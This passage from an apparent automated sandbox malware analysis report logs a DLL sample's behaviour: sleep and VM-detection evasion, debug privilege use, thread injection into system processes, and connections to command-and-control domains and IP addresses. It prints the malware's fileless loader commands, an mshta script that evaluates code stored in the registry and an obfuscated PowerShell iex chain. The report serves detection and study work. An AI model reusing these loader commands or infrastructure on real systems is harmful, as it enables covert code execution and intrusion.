Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\loaddll32.exe	Window / User API: threadDelayed 390	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Window / User API: threadDelayed 799	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 1425	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 506	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 1129	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 1555	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 870	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 862	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6259
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2927
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6479
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2798
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1803
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6739
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2705

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361113599.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.338033120.000000000336B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWh4[
Source: rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914184707.0000000000FA1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.338394833.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW-b^u
Source: mshta.exe, 00000016.00000003.382843473.000001823555B000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\7p
Source: loaddll32.exe, 00000000.00000003.522936760.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317739016.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.686994186.0000000001344000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.523272114.000000000130A000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361113599.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.338033120.000000000336B000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000004.00000003.811718040.0000000000F5A000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW@
Source: mshta.exe, 00000017.00000002.390538379.000002B5EF59B000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Anti Debugging:

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: berukoneru.website
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 79.110.52.144 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: windows.update3.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 18.219.227.107 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 3.12.124.139 187	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: unknown protection: execute and read and write

Writes to foreign memory regions

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\BackgroundTransferHost.exe base: 7FF65B0E12E0	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\BackgroundTransferHost.exe base: 7FF65B0E12E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF65B0E12E0	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3472
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3472
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3472

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: unknown EIP: 9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: unknown EIP: 9B851580

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>F7u2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F7u2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ygup='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ygup).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Me2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Me2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cf1r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cf1r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: unknown unknown

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
